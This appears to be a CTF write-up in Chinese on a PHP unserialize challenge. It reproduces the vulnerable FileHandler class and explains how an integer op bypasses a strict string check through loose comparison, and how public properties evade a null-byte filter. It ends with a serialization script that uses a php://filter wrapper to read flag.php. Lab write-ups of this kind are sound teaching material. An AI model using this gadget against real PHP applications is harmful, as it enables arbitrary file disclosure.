class FileHandler {
protected $op;
protected $filename;
protected $content;
function __construct(){
$op = "1";
$filename = "/tmp/tmpfile";
$content = "Hello World!";
$this->process();
}
public function process() {
if($this->op == "1") {
$this->write();
} else if($this->op == "2") {
$res = $this->read();
$this->output($res);
} else {
$this->output("Bad Hacker!");
}
}
private function write() {
if(isset($this->filename) && isset($this->content)) {
if(strlen((string)$this->content) > 100) {
$this->output("Too long!");
die();
}
$res = file_put_contents($this->filename, $this->content);
if($res) $this->output("Successful!");
else $this->output("Failed!");
} else {
$this->output("Failed!");
}
}
private function read() {
$res = "";
if(isset($this->filename)) {
$res = file_get_contents($this->filename);
}
return $res;
}
private function output($s) {
echo "[Result]: <br>";
echo $s;
}
function __destruct() {
if($this->op === "2")
$this->op = "1";
$this->content = "";
$this->process();
}
}
这里面的函数通过分析可知:_construct函数可以不管,因为在反序列化时是不会自动调用的,在创建一个新对象时会调用,而_destruct是在销毁一个对象时调用,而PHP中大部分都会自动调用他,这里面说,不能让op==="2",注意是字符2,所以我们可以让op=2,整数2,在process里面是弱比较,可以通成功执行read函数,达到读取flag.php 的目的;然后就是
function is_valid($s) {
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
这个函数主要是过滤掉protect类的成员在序列化的时候是以%00作为标识符但是在PHP版本大于7.1的情况下,protect类和public类没什么好注意的,所以在构造序列化时改为public可以绕过is_valid函数,构造PHP序列化:
<?php
highlight_file(__FILE__);
class FileHandler {
public $op=2;
public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
public $content;
}
$str = new FileHandler();
echo serialize($str);
?>
这里的filenam用了伪协议吧内容base64加密显示出来,也可以不用,直接flag.php也可以
由于没学过PHP,原来写diamante的时候,类里面只要说明变量即可,就和struct一样;?
|